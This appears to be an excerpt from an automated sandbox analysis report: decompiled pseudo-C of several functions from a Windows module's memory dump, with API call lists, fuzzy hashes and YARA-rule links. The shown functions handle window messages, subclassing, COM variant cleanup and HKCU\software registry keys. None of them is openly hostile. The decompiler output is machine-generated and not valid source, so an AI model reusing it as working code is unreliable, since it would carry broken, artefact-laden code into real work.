					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
						_t69 = _v36;
					}
					 *((intOrPtr*)( *_t88 + 0x118))(_a4, _t87);
					E100121C7(_t88, 0, _t69 & 0x10000000, 0);
					_t30 = _t87 + 9; // 0xfc4d8b00
					_t57 =  *_t30;
					_t68 = 0x415;
					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
						_push(1);
						_push(0);
						goto L9;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x118))() != 0) {
							_push(1);
							_push( &_v52);
							L9:
							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
						}
					}
				}
				return E1003F29E(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
			}

0x10014bcf
0x10014bd7
0x10014bde
0x10014be3
0x10014be6
0x10014bed
0x10014bee
0x10014bf3
0x10014bf8
0x10014bfe
0x10014c09
0x10014c0d
0x10014c11
0x10014c15
0x10014c23
0x10014c2c
0x10014c35
0x10014c3e
0x10014c41
0x10014c54
0x10014c5e
0x10014c7d
0x10014c80
0x10014c91
0x10014ca0
0x10014cab
0x10014cad
0x10014cb4
0x10014cb4
0x10014cc4
0x10014cd7
0x10014cdc
0x10014cdc
0x10014ce4
0x10014ce8
0x10014d17
0x10014d19
0x00000000
0x10014cf5
0x10014cfa
0x10014cfb
0x10014d00
0x10014d0d
0x10014d0f
0x10014d14
0x10014d1b
0x10014d1e
0x10014d1e
0x10014d0d
0x10014ce8
0x10014d31

APIs

_memcmp.LIBCMT ref: 10014C19

Part of subcall function 10012193: GetWindowLongA.USER32 ref: 1001219E

SendMessageA.USER32(?,0000043D,00000000,00000000), ref: 10014C72
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 10014C80
SendMessageA.USER32(?,0000043C,?,00000000), ref: 10014C91
SendMessageA.USER32(?,0000043C,?,00000000), ref: 10014CA0
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 10014CAB
InvalidateRect.USER32(?,00000000,00000001,00000000,00000000,?,?,?,?), ref: 10014D1E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$InvalidateLongRectWindow_memcmp
String ID:
API String ID: 235743446-0
Opcode ID: d4d6b4b86ebc6563a22041f8524e7df695cf2a7e2aa9fa2cba2300f14a2be68c
Instruction ID: 7bab64c69d62f66650b697aebb5bf93262598f63159583d7cb53a79df950dd32
Opcode Fuzzy Hash: d4d6b4b86ebc6563a22041f8524e7df695cf2a7e2aa9fa2cba2300f14a2be68c
Instruction Fuzzy Hash: DE417F30640308BFEB11DB64CC56FAEBBB5FF08B54F114518FA556A1E1DBB0A950CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1000E772, Relevance: 10.6, APIs: 7, Instructions: 117
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000E772(intOrPtr* __ecx, signed int _a4) {
				int _v8;
				int _v12;
				int _v16;
				struct tagMSG* _v20;
				struct HWND__* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t48;
				struct tagMSG* _t49;
				signed int _t51;
				void* _t54;
				void* _t56;
				int _t59;
				long _t62;
				signed int _t66;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t70 = __ecx;
				_t74 = __ecx;
				_v16 = 1;
				_v12 = 0;
				if((_a4 & 0x00000004) == 0) {
					L2:
					_v8 = 0;
					L3:
					_t48 = GetParent( *(_t74 + 0x20));
					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) | 0x00000018;
					_v24 = _t48;
					_t49 = E10017D67(_t76);
					_t69 = UpdateWindow;
					_v20 = _t49;
					while(1) {
						_t77 = _v16;
						if(_v16 == 0) {
							goto L15;
						}
						while(1) {
							L15:
							_t51 = E100181F3(_t70, 0, _t74, _t77);
							if(_t51 == 0) {
								break;
							}
							if(_v8 != 0) {
								_t59 = _v20->message;
								if(_t59 == 0x118 || _t59 == 0x104) {
									E100122EA(_t74, 1);
									UpdateWindow( *(_t74 + 0x20));
									_v8 = 0;
								}
							}
							_t71 = _t74;
							_t54 =  *((intOrPtr*)( *_t74 + 0x88))();
							_t82 = _t54;
							if(_t54 == 0) {
								_t45 = _t74 + 0x3c;
								 *_t45 =  *(_t74 + 0x3c) & 0xffffffe7;
								__eflags =  *_t45;
								return  *((intOrPtr*)(_t74 + 0x44));
							} else {
								_push(_v20);
								_t56 = E100180E2(_t69, _t71, 0, _t74, _t82);
								_pop(_t70);
								if(_t56 != 0) {
									_v16 = 1;
									_v12 = 0;
								}
								if(PeekMessageA(_v20, 0, 0, 0, 0) == 0) {
									while(1) {
										_t77 = _v16;
										if(_v16 == 0) {
											goto L15;
										}
										goto L4;
									}
								}
								continue;
							}
						}
						_push(0);
						E100197D1();
						return _t51 | 0xffffffff;
						L4:
						__eflags = PeekMessageA(_v20, 0, 0, 0, 0);
						if(__eflags != 0) {
							goto L15;
						} else {
							__eflags = _v8;
							if(_v8 != 0) {
								_t70 = _t74;
								E100122EA(_t74, 1);
								UpdateWindow( *(_t74 + 0x20));
								_v8 = 0;
							}
							__eflags = _a4 & 0x00000001;
							if((_a4 & 0x00000001) == 0) {
								__eflags = _v24;
								if(_v24 != 0) {
									__eflags = _v12;
									if(_v12 == 0) {
										SendMessageA(_v24, 0x121, 0,  *(_t74 + 0x20));
									}
								}
							}
							__eflags = _a4 & 0x00000002;
							if(__eflags != 0) {
								L13:
								_v16 = 0;
								continue;
							} else {
								_t62 = SendMessageA( *(_t74 + 0x20), 0x36a, 0, _v12);
								_v12 = _v12 + 1;
								__eflags = _t62;
								if(__eflags != 0) {
									continue;
								}
								goto L13;
							}
						}
					}
				}
				_t66 = E10012193(__ecx);
				_v8 = 1;
				_t76 = _t66 & 0x10000000;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}

0x1000e772
0x1000e786
0x1000e788
0x1000e78b
0x1000e78e
0x1000e79f
0x1000e79f
0x1000e7a2
0x1000e7a5
0x1000e7ab
0x1000e7af
0x1000e7b2
0x1000e7b7
0x1000e7bd
0x1000e82d
0x1000e82d
0x1000e830
0x00000000
0x00000000
0x1000e832
0x1000e832
0x1000e832
0x1000e839
0x00000000
0x00000000
0x1000e83e
0x1000e843
0x1000e84b
0x1000e858
0x1000e860
0x1000e862
0x1000e862
0x1000e84b
0x1000e867
0x1000e869
0x1000e86f
0x1000e871
0x1000e8a8
0x1000e8a8
0x1000e8a8
0x00000000
0x1000e873
0x1000e873
0x1000e876
0x1000e87b
0x1000e87e
0x1000e880
0x1000e887
0x1000e887
0x1000e899
0x1000e82d
0x1000e82d
0x1000e830
0x00000000
0x00000000
0x00000000
0x1000e830
0x1000e82d
0x00000000
0x1000e899
0x1000e871
0x1000e89d
0x1000e89e
0x00000000
0x1000e7c2
0x1000e7cf
0x1000e7d1
0x00000000
0x1000e7d3
0x1000e7d3
0x1000e7d6
0x1000e7da
0x1000e7dc
0x1000e7e4
0x1000e7e6
0x1000e7e6
0x1000e7e9
0x1000e7ed
0x1000e7ef
0x1000e7f2
0x1000e7f4
0x1000e7f7
0x1000e805
0x1000e805
0x1000e7f7
0x1000e7f2
0x1000e80b
0x1000e80f
0x1000e82a
0x1000e82a
0x00000000
0x1000e811
0x1000e81d
0x1000e823
0x1000e826
0x1000e828
0x00000000
0x00000000
0x00000000
0x1000e828
0x1000e80f
0x1000e7d1
0x1000e82d
0x1000e790
0x1000e795
0x1000e798
0x1000e79d
0x00000000
0x00000000
0x00000000

APIs

GetParent.USER32(?), ref: 1000E7A5
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000E7C9
UpdateWindow.USER32(?), ref: 1000E7E4
SendMessageA.USER32(?,00000121,00000000,?), ref: 1000E805
SendMessageA.USER32(?,0000036A,00000000,00000002), ref: 1000E81D
UpdateWindow.USER32(?), ref: 1000E860
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000E891

Part of subcall function 10012193: GetWindowLongA.USER32 ref: 1001219E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: afac22c44834bc7f77c6a1d335e4de6714e9c35748f941926c49567b0995758a
Instruction ID: 658ca2a96f7ca59fbe150a8d079c0c9c4f075cacb5d69a5e5aed364de75c3b3e
Opcode Fuzzy Hash: afac22c44834bc7f77c6a1d335e4de6714e9c35748f941926c49567b0995758a
Instruction Fuzzy Hash: D5417C70A00685EBEB21CF65CC88E9EBBF4FF84B80F10856DE549B61A5DB319E40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000ED2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000ED2C(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E10017D5E();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1001F13B(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E10041630(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x2c;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				_t61 = _t34;
				E1000EB43(_t72, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf8))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000EC72(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x11c))();
			}

0x1000ed37
0x1000ed3e
0x1000ed44
0x1000ed49
0x1000ed6e
0x1000ed6e
0x1000ed74
0x1000ed76
0x1000ed76
0x1000ed74
0x1000ed79
0x1000ed7e
0x1000ed82
0x1000ed85
0x1000ed85
0x1000ed88
0x1000ed90
0x1000ed95
0x1000ed95
0x1000ed98
0x1000ed9c
0x1000ed9f
0x1000eda6
0x1000edab
0x1000edad
0x1000edb1
0x1000edbb
0x1000edc0
0x1000edc6
0x1000edc9
0x1000edda
0x1000ede1
0x1000ede4
0x1000ede4
0x1000edb1
0x1000edab
0x1000edf6
0x1000edfa
0x1000edfc
0x1000ee0b
0x1000ee17
0x1000ee1b
0x1000ee23
0x1000ee23
0x1000ee1b
0x1000ee2b
0x1000ee3e

APIs

_memset.LIBCMT ref: 1000EDBB
SendMessageA.USER32(00000000,00000405,00000000,?), ref: 1000EDE4
GetWindowLongA.USER32 ref: 1000EDF6
GetWindowLongA.USER32 ref: 1000EE07
SetWindowLongA.USER32 ref: 1000EE23

Strings

,, xrefs: 1000EDDA

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: ac0d9f6f3be424cdca0e53a6dfcf5774b64e4fe67b5a2af16ca762f209c5069d
Instruction ID: abb67f73d722d20fa102e13ec1147438c5285dbb0b6d7c30a6f5229bad0a3baf
Opcode Fuzzy Hash: ac0d9f6f3be424cdca0e53a6dfcf5774b64e4fe67b5a2af16ca762f209c5069d
Instruction Fuzzy Hash: 4F31B279600755AFE710EF64C884A5AB7E4FF48390F11062EF586AB692EB30EC40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10017B77, Relevance: 10.6, APIs: 7, Instructions: 82
stringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E10017B77(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t44;
				void* _t45;
				int _t57;
				void* _t75;
				void* _t77;
				intOrPtr* _t78;
				intOrPtr* _t79;
				void* _t80;

				_t59 = __ebx;
				_push(0x4c);
				E10041CAB(0x10052549, __ebx, __edi, __esi);
				_t77 = __ecx;
				E100025B0(_t80 - 0x10,  *((intOrPtr*)(_t80 + 8)));
				 *((intOrPtr*)(_t80 - 4)) = 0;
				 *((intOrPtr*)(_t80 + 8)) = 0;
				 *((char*)(_t80 - 4)) = 1;
				E10016E5C(_t80 + 8, E10002770(_t80 - 0x10));
				E10027FD7(_t80 - 0x58);
				 *((short*)(_t80 - 0x58)) = 0;
				 *((char*)(_t80 - 4)) = 2;
				if( *(_t80 + 0x18) != 0) {
					_t57 =  *(_t80 + 0x1c);
					_t83 = _t57;
					if(_t57 == 0) {
						_t57 = lstrlenA( *(_t80 + 0x18));
					}
					E1002839D(_t59, _t80 - 0x58, 0x11, _t57,  *(_t80 + 0x18), 0);
				}
				_t78 =  *((intOrPtr*)(_t77 + 0xf0));
				_t75 = E100284F5(_t59, _t80 - 0x40, 0, _t78, _t83);
				 *((char*)(_t80 - 4)) = 3;
				_t44 = E100284F5(_t59, _t80 - 0x30, _t75, _t78, _t83);
				 *((char*)(_t80 - 4)) = 4;
				_t45 = E10027E6A(_t80 - 0x20,  *((intOrPtr*)(_t80 + 0xc)), 3);
				 *((char*)(_t80 - 4)) = 5;
				 *((intOrPtr*)( *_t78 + 0x2c))(_t78,  *((intOrPtr*)(_t80 + 8)), _t45, _t44, _t80 - 0x58, _t75,  *((intOrPtr*)(_t80 + 0x10)), 8,  *((intOrPtr*)(_t80 + 0x14)), 8);
				_t79 = __imp__#9;
				 *_t79(_t80 - 0x20);
				 *_t79(_t80 - 0x30);
				 *_t79(_t80 - 0x40);
				 *_t79(_t80 - 0x58);
				__imp__#6( *((intOrPtr*)(_t80 + 8)));
				return E10041D83(E10001020( *((intOrPtr*)(_t80 - 0x10)) + 0xfffffff0));
			}

0x10017b77
0x10017b77
0x10017b7e
0x10017b83
0x10017b8b
0x10017b92
0x10017b95
0x10017b9b
0x10017ba8
0x10017bb1
0x10017bb8
0x10017bbc
0x10017bc3
0x10017bc5
0x10017bc8
0x10017bca
0x10017bcf
0x10017bcf
0x10017bdf
0x10017bdf
0x10017be4
0x10017bf7
0x10017c01
0x10017c05
0x10017c14
0x10017c18
0x10017c29
0x10017c2e
0x10017c31
0x10017c3b
0x10017c41
0x10017c47
0x10017c4d
0x10017c52
0x10017c68

APIs

__EH_prolog3.LIBCMT ref: 10017B7E

Part of subcall function 10016E5C: SysFreeString.OLEAUT32(00000000), ref: 10016E6F

Part of subcall function 10027FD7: _memset.LIBCMT ref: 10027FE9

lstrlenA.KERNEL32(00000000,?,00000000,10003395,0000004C,10017D4B,10003395,00000000,00000000,00000000,00000000,00000000,?,?,?,10003395), ref: 10017BCF
VariantClear.OLEAUT32(?), ref: 10017C3B
VariantClear.OLEAUT32(?), ref: 10017C41
VariantClear.OLEAUT32(?), ref: 10017C47
VariantClear.OLEAUT32(?), ref: 10017C4D
SysFreeString.OLEAUT32(10003395), ref: 10017C52

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant$FreeString$H_prolog3_memsetlstrlen
String ID:
API String ID: 4113791870-0
Opcode ID: ab48b44252814af12d407a63ea9b34fb15dfdee13af523f3b8c7a27a1bff0fc7
Instruction ID: 48a75f953123c555bc1418834a790eb83c1fa314b2ce6d45b910c57311c83233
Opcode Fuzzy Hash: ab48b44252814af12d407a63ea9b34fb15dfdee13af523f3b8c7a27a1bff0fc7
Instruction Fuzzy Hash: CB31277580025AAADF01DFE0CC85EEEBB78FF54344F104059F905AB291EB70AA55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001B3CD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B3CD(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x1001b3ea
0x1001b3f1
0x1001b3f4
0x1001b3f7
0x1001b3fa
0x1001b405
0x1001b43c
0x1001b43c
0x1001b447
0x1001b44c
0x1001b44c
0x1001b451
0x1001b456
0x1001b456
0x1001b45f

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000,?,?,00000004,100036E9), ref: 1001B3FD
RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,00000000,00000004,?,?,00000004,100036E9), ref: 1001B420
RegCreateKeyExA.ADVAPI32(00000000,00000004,00000000,00000000,00000000,0002001F,00000000,100036E9,00000004,?,?,00000004,100036E9), ref: 1001B43C
RegCloseKey.ADVAPI32(?,?,?,00000004,100036E9), ref: 1001B44C
RegCloseKey.ADVAPI32(00000000,?,?,00000004,100036E9), ref: 1001B456

Strings

software, xrefs: 1001B3E5

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 9bf59e1b864304ee6a91e40fa8f01e718c43bfe348d9f0188cd75ef43a738139
Instruction ID: 93bec9d956f4b0775c97a164b88f75299b6cf17b24837af33a2b09c440129c01
Opcode Fuzzy Hash: 9bf59e1b864304ee6a91e40fa8f01e718c43bfe348d9f0188cd75ef43a738139
Instruction Fuzzy Hash: 2011F572900158BBDB21DF8ACD88CDFBFBDEF89750B1040AAF504A2121D7319A44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CBE4, Relevance: 10.6, APIs: 7, Instructions: 61COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 1000CBF2
GetWindowRect.USER32 ref: 1000CC0D
ScreenToClient.USER32 ref: 1000CC20
ScreenToClient.USER32 ref: 1000CC29
EqualRect.USER32 ref: 1000CC33
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 1000CC5B
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 1000CC65

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 833d8d1928dcb2a7233c3bf523bf63d5e3059f0a53c05caaa8998df7c31524c5
Instruction ID: f6e46907d24f484fe9dd223547db1f92eb1b7ff2dcccc6687a3feab436d4fb45
Opcode Fuzzy Hash: 833d8d1928dcb2a7233c3bf523bf63d5e3059f0a53c05caaa8998df7c31524c5
Instruction Fuzzy Hash: 1F110DB6500619AFE700DF64DD88DAB7BBDFB88750F108519FD56D3258E731A900CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1003E624, Relevance: 9.3, APIs: 6, Instructions: 256
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E1003E624(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed int _t141;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed short _t154;
				signed int _t156;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				CHAR* _t176;
				void* _t179;
				void* _t182;
				intOrPtr _t185;
				CHAR* _t188;
				CHAR* _t189;
				int _t191;
				char* _t194;
				void* _t195;
				void* _t196;
				CHAR* _t197;
				char* _t199;
				void* _t200;
				long long _t205;

				_t200 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E10041D4A(0x10054503, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t196 - 0x34)) = __ecx;
				E1001F154(_t196 - 0x2c, _t200,  *((intOrPtr*)(__ecx + 0x1c)));
				_t176 =  *(_t196 + 8);
				_t121 = _t176[8];
				_t187 = 0;
				 *(_t196 - 4) = 0;
				 *(_t196 - 0x19) = 0;
				 *(_t196 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t196 - 0x18) = _t196 - 0x19;
				}
				_t191 = lstrlenA( *(_t196 - 0x18));
				 *(_t196 - 0x20) = _t176[0x10];
				 *(_t196 - 0x24) = _t176[0xc] & 0x0000ffff;
				if(( *(_t196 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t192 =  *(_t196 + 0x14);
					_t127 = E10003A10(_t185,  *(_t192 + 8) << 4);
					_pop(_t179);
					__eflags = _t127;
					if(_t127 != 0) {
						_t192 =  *(_t192 + 8);
						__eflags = _t192 - 0x7ffffff;
						if(_t192 > 0x7ffffff) {
							goto L12;
						}
						_t193 = _t192 << 4;
						E100421D0(_t192 << 4);
						 *(_t196 - 0x10) = _t197;
						 *(_t196 - 0x30) = _t197;
						E10041630(_t187,  *(_t196 - 0x30), _t187, _t192 << 4);
						_t199 =  &(_t197[0xc]);
						_t187 = E1003E209(_t179, _t187, _t193,  *(_t196 - 0x18),  *(_t196 - 0x24));
						_t49 =  &(_t187[8]); // 0x10
						_t192 = _t49;
						_t135 = E10003A10(_t185, _t49);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
							if( *(_t196 - 0x28) == 0) {
								L7:
								L55:
								return E10041DA6(_t176, _t187, _t192);
							}
							_push( *((intOrPtr*)(_t196 - 0x2c)));
							_push(0);
							L6:
							E1001E961();
							goto L7;
						}
						E100421D0(_t192);
						 *(_t196 - 0x10) = _t199;
						_t176 = 0;
						_t194 = _t199;
						 *((intOrPtr*)(_t196 - 0x58)) = 0x1005d564;
						 *((intOrPtr*)(_t196 - 0x54)) = 0;
						 *((intOrPtr*)(_t196 - 0x48)) = 0;
						 *((intOrPtr*)(_t196 - 0x4c)) = 0;
						 *((intOrPtr*)(_t196 - 0x50)) = 0;
						_push(_t196 - 0x58);
						_push( *(_t196 - 0x30));
						_push( *((intOrPtr*)(_t196 + 0x18)));
						 *(_t196 - 4) = 1;
						_push( *(_t196 + 0x14));
						_push( *(_t196 - 0x24));
						_push(_t196 - 0x44);
						_push( *(_t196 - 0x18));
						_push(_t194);
						_t140 = E1003E340(0,  *((intOrPtr*)(_t196 - 0x34)), _t187, _t194, __eflags);
						 *(_t196 - 0x18) = _t140;
						__eflags = _t140;
						if(_t140 != 0) {
							L26:
							_t141 =  *(_t196 + 0x14);
							_t192 = 0;
							__eflags =  *(_t141 + 8);
							if( *(_t141 + 8) <= 0) {
								L29:
								__eflags =  *(_t196 - 0x18);
								_t182 = _t196 - 0x58;
								if( *(_t196 - 0x18) == 0) {
									E1003E299(_t182);
									_t187 =  *(_t196 + 0x10);
									__eflags = _t187;
									if(_t187 == 0) {
										_t144 = ( *(_t196 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t176);
											L52:
											 *(_t196 - 4) = 0;
											E1003D57A(_t196 - 0x58);
											 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
											__eflags =  *(_t196 - 0x28);
											if( *(_t196 - 0x28) != 0) {
												_push( *((intOrPtr*)(_t196 - 0x2c)));
												_push(0);
												E1001E961();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t176;
											if(_t176 != 0) {
												 *((intOrPtr*)( *_t176 + 8))(_t176);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t196 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t154 =  *(_t196 - 0x24);
									 *_t187 = _t154;
									_t156 = (_t154 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t156 - 0x13;
									if(_t156 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t156 * 4 +  &M1003E93C))) {
										case 0:
											 *((short*)(__edi + 8)) = __bx;
											goto L52;
										case 1:
